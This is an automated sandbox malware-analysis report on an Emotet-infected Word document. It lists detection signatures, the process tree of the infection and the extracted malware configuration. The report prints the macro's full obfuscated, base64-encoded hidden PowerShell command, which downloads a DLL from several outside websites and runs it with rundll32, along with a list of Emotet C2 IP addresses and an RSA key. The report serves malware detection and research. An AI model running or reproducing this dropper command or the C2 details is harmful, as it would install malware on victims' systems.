Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report ARCHIVOFile-20-012021.doc

Overview

General Information

Sample Name:ARCHIVOFile-20-012021.doc
Analysis ID:344894
MD5:d4829a31da294d0ee8f9f67bc1352bd2
SHA1:70601272023fd5285194c68da776708508524d50
SHA256:4fc909106f65c1ca7c9073743cbc8a7513a4ce7ae3d04e38bd01847e96aaf9f5

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Abnormal high CPU Usage
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document has an unknown application name
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1108 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2652 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAKQArACcAaAAnACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbgAnACkAKwAoACcAbwByAGEAaQBsACcAKwAnAHkAJwApACsAJwBhACcAKwAoACcALgAnACsAJwBjAG8AJwArACcAbQAvAGQAcgAnACkAKwAnAHUAcAAnACsAKAAnAGEAbAAnACsAJwAvACcAKQArACgAJwByACcAKwAnAGUAdABBACcAKQArACcAbAAnACsAKAAnAC8AJwArACcAQABzAGcAJwApACsAJwAgAHkAJwArACgAJwB3ACAAYQBoAHMAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnAGgAYgBwAHIAaQB2AGkAJwArACcAbAAnACsAJwBlACcAKwAnAGcAJwApACsAJwBlACcAKwAnAGQALgAnACsAJwBjAG8AJwArACgAJwBtAC8AYwBnACcAKwAnAGkALQBiAGkAbgAnACsAJwAvAFEAZwAnACkAKwAoACcALwBAAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIAAnACsAJwBhAGgAcwAnACkAKwAnADoAJwArACcALwAvACcAKwAnAHUAJwArACcAbQBtACcAKwAoACcAYQBoAHMAdABhAHIAJwArACcAcwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAGEAcAAnACsAJwBwAF8AJwApACsAJwBvACcAKwAoACcAbABkAF8AJwArACcAbQAnACkAKwAoACcAYQB5AF8AJwArACcAMgAnACkAKwAnADAAJwArACgAJwAxADgAJwArACcALwAnACkAKwAoACcAYQBzACcAKwAnAHMAZQB0AHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAAnACsAJwB4ACcAKQArACcALwAnACsAKAAnAEAAcwAnACsAJwBnACAAJwApACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhAGgAJwArACcAcwAnACkAKwAnADoAJwArACgAJwAvAC8AdwB3AHcAJwArACcALgAnACkAKwAnAHQAJwArACcAZQBlACcAKwAoACcAbABlAGsAZAAnACsAJwBlAGQAJwArACcALgBjAG8AbQAvACcAKQArACgAJwBjAGcAJwArACcAaQAtAGIAaQAnACsAJwBuACcAKQArACcALwAnACsAKAAnAEwAUAAnACsAJwBvAC8AJwApACkALgAiAFIAYABlAHAAYABsAEEAYwBFACIAKAAoACcAcwAnACsAKAAnAGcAJwArACcAIAB5AHcAIAAnACsAJwBhACcAKQArACcAaAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAZQAnACsAJwB3AGYAJwApACkALAAoACcAdwAnACsAKAAnAGUAJwArACcAdgB3AGUAJwApACkAKQAsACgAJwBhACcAKwAoACcAZQBmACcAKwAnAGYAJwApACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACkAWwAyAF0AKQAuACIAcwBQAGAAbABpAFQAIgAoACQAVAA5ADIAVgAgACsAIAAkAFgAagBiADYAdQB1ADkAIAArACAAJABVADUAXwBXACkAOwAkAEYAMQA4AEgAPQAoACcAWQAnACsAKAAnADEANwAnACsAJwBYACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIADIAMAA5AG0AMwA0ACAAaQBuACAAJABPAHoAeAA5AHgAawBkACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAJwArACcAagBlAGMAdAAnACkAIABzAFkAUwB0AEUATQAuAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAFQAKQAuACIARABvAHcAYABOAEwATwBBAEQAYABGAEkAYABsAEUAIgAoACQASAAyADAAOQBtADMANAAsACAAJABJAHEANgByAGYAZwAwACkAOwAkAFYAMwAyAEUAPQAoACgAJwBYACcAKwAnADcAMQAnACkAKwAnAEcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEkAcQA2AHIAZgBnADAAKQAuACIATABlAE4AYABnAHQASAAiACAALQBnAGUAIAAzADQAMgA1ADgAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQASQBxADYAcgBmAGcAMAAsACgAJwBTAGgAJwArACgAJwBvAHcARAAnACsAJwBpACcAKQArACcAYQAnACsAKAAnAGwAbwBnACcAKwAnAEEAJwApACkALgAiAHQAYABPAFMAVABgAFIAaQBOAEcAIgAoACkAOwAkAFAAOAA5AEcAPQAoACcAUwA4ACcAKwAnADEAVAAnACkAOwBiAHIAZQBhAGsAOwAkAEsAMgAwAEcAPQAoACcAQgAnACsAKAAnADEAJwArACcAMgBHACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTADMAMwBaAD0AKAAnAFEAJwArACgAJwBfADUAJwArACcAQQAnACkAKQA= MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2564 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
      • rundll32.exe (PID: 1336 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
    • powershell.exe (PID: 2552 cmdline: powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAKQArACcAaAAnACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbgAnACkAKwAoACcAbwByAGEAaQBsACcAKwAnAHkAJwApACsAJwBhACcAKwAoACcALgAnACsAJwBjAG8AJwArACcAbQAvAGQAcgAnACkAKwAnAHUAcAAnACsAKAAnAGEAbAAnACsAJwAvACcAKQArACgAJwByACcAKwAnAGUAdABBACcAKQArACcAbAAnACsAKAAnAC8AJwArACcAQABzAGcAJwApACsAJwAgAHkAJwArACgAJwB3ACAAYQBoAHMAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnAGgAYgBwAHIAaQB2AGkAJwArACcAbAAnACsAJwBlACcAKwAnAGcAJwApACsAJwBlACcAKwAnAGQALgAnACsAJwBjAG8AJwArACgAJwBtAC8AYwBnACcAKwAnAGkALQBiAGkAbgAnACsAJwAvAFEAZwAnACkAKwAoACcALwBAAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIAAnACsAJwBhAGgAcwAnACkAKwAnADoAJwArACcALwAvACcAKwAnAHUAJwArACcAbQBtACcAKwAoACcAYQBoAHMAdABhAHIAJwArACcAcwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAGEAcAAnACsAJwBwAF8AJwApACsAJwBvACcAKwAoACcAbABkAF8AJwArACcAbQAnACkAKwAoACcAYQB5AF8AJwArACcAMgAnACkAKwAnADAAJwArACgAJwAxADgAJwArACcALwAnACkAKwAoACcAYQBzACcAKwAnAHMAZQB0AHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAAnACsAJwB4ACcAKQArACcALwAnACsAKAAnAEAAcwAnACsAJwBnACAAJwApACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhAGgAJwArACcAcwAnACkAKwAnADoAJwArACgAJwAvAC8AdwB3AHcAJwArACcALgAnACkAKwAnAHQAJwArACcAZQBlACcAKwAoACcAbABlAGsAZAAnACsAJwBlAGQAJwArACcALgBjAG8AbQAvACcAKQArACgAJwBjAGcAJwArACcAaQAtAGIAaQAnACsAJwBuACcAKQArACcALwAnACsAKAAnAEwAUAAnACsAJwBvAC8AJwApACkALgAiAFIAYABlAHAAYABsAEEAYwBFACIAKAAoACcAcwAnACsAKAAnAGcAJwArACcAIAB5AHcAIAAnACsAJwBhACcAKQArACcAaAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAZQAnACsAJwB3AGYAJwApACkALAAoACcAdwAnACsAKAAnAGUAJwArACcAdgB3AGUAJwApACkAKQAsACgAJwBhACcAKwAoACcAZQBmACcAKwAnAGYAJwApACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACkAWwAyAF0AKQAuACIAcwBQAGAAbABpAFQAIgAoACQAVAA5ADIAVgAgACsAIAAkAFgAagBiADYAdQB1ADkAIAArACAAJABVADUAXwBXACkAOwAkAEYAMQA4AEgAPQAoACcAWQAnACsAKAAnADEANwAnACsAJwBYACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIADIAMAA5AG0AMwA0ACAAaQBuACAAJABPAHoAeAA5AHgAawBkACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAJwArACcAagBlAGMAdAAnACkAIABzAFkAUwB0AEUATQAuAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAFQAKQAuACIARABvAHcAYABOAEwATwBBAEQAYABGAEkAYABsAEUAIgAoACQASAAyADAAOQBtADMANAAsACAAJABJAHEANgByAGYAZwAwACkAOwAkAFYAMwAyAEUAPQAoACgAJwBYACcAKwAnADcAMQAnACkAKwAnAEcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEkAcQA2AHIAZgBnADAAKQAuACIATABlAE4AYABnAHQASAAiACAALQBnAGUAIAAzADQAMgA1ADgAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQASQBxADYAcgBmAGcAMAAsACgAJwBTAGgAJwArACgAJwBvAHcARAAnACsAJwBpACcAKQArACcAYQAnACsAKAAnAGwAbwBnACcAKwAnAEEAJwApACkALgAiAHQAYABPAFMAVABgAFIAaQBOAEcAIgAoACkAOwAkAFAAOAA5AEcAPQAoACcAUwA4ACcAKwAnADEAVAAnACkAOwBiAHIAZQBhAGsAOwAkAEsAMgAwAEcAPQAoACcAQgAnACsAKAAnADEAJwArACcAMgBHACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTADMAMwBaAD0AKAAnAFEAJwArACgAJwBfADUAJwArACcAQQAnACkAKQA= MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2364 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2360 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2460 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2484 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptX MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2404 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 3032 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',Keza MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 3064 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 1616 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDub MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2244 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2380 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 2372 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 2564 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggq MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["84.232.229.24:80", "51.255.203.164:8080", "217.160.169.110:8080", "51.15.7.145:80", "177.85.167.10:80", "186.177.174.163:80", "190.114.254.163:8080", "185.183.16.47:80", "149.202.72.142:7080", "181.30.61.163:443", "31.27.59.105:80", "50.28.51.143:8080", "68.183.190.199:8080", "85.214.26.7:8080", "137.74.106.111:7080", "200.75.39.254:80", "85.105.239.184:443", "190.45.24.210:80", "170.81.48.2:80", "109.101.137.162:8080", "110.39.160.38:443", "110.39.162.2:443", "91.233.197.70:80", "51.255.165.160:8080", "213.52.74.198:80", "12.162.84.2:8080", "82.208.146.142:7080", "60.93.23.51:80", "172.245.248.239:8080", "104.131.41.185:8080", "93.149.120.214:80", "81.214.253.80:443", "190.247.139.101:80", "46.105.114.137:8080", "70.32.115.157:8080", "202.134.4.210:7080", "212.71.237.140:8080", "177.23.7.151:80", "111.67.12.221:8080", "197.232.36.108:80", "190.162.232.138:80", "80.15.100.37:80", "95.76.153.115:80", "154.127.113.242:80", "188.225.32.231:7080", "5.196.35.138:7080", "211.215.18.93:8080", "46.101.58.37:8080", "82.48.39.246:80", "181.10.46.92:80", "190.251.216.100:80", "187.162.248.237:80", "191.223.36.170:80", "138.197.99.250:8080", "201.48.121.65:443", "78.206.229.130:80", "190.210.246.253:80", "68.183.170.114:8080", "87.106.46.107:8080", "122.201.23.45:443", "70.32.84.74:8080", "143.0.85.206:7080", "190.64.88.186:443", "217.13.106.14:8080", "93.146.143.191:80", "188.135.15.49:80", "178.211.45.66:8080", "138.97.60.141:7080", "81.17.93.134:80", "83.169.21.32:7080", "152.231.89.226:80", "80.249.176.206:80", "178.250.54.208:8080", "206.189.232.2:8080", "46.43.2.95:8080", "190.24.243.186:80", "105.209.235.113:8080", "62.84.75.50:80", "152.170.79.100:80", "209.236.123.42:8080", "185.94.252.27:443", "12.163.208.58:80", "152.169.22.67:80", "1.226.84.243:8080", "191.241.233.198:80", "94.176.234.118:443", "209.33.120.130:80", "45.16.226.117:443", "81.215.230.173:443", "172.104.169.32:8080", "201.185.69.28:443", "167.71.148.58:443", "192.175.111.212:7080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.2222429242.0000000010000000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000012.00000002.2338162997.0000000010000000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000012.00000002.2336996681.0000000000290000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        0000000E.00000002.2189259516.0000000010000000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          0000000A.00000002.2148553869.0000000000710000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 31 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.rundll32.exe.10000000.3.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              13.2.rundll32.exe.10000000.2.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                9.2.rundll32.exe.170000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  8.2.rundll32.exe.10000000.3.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    16.2.rundll32.exe.1d0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
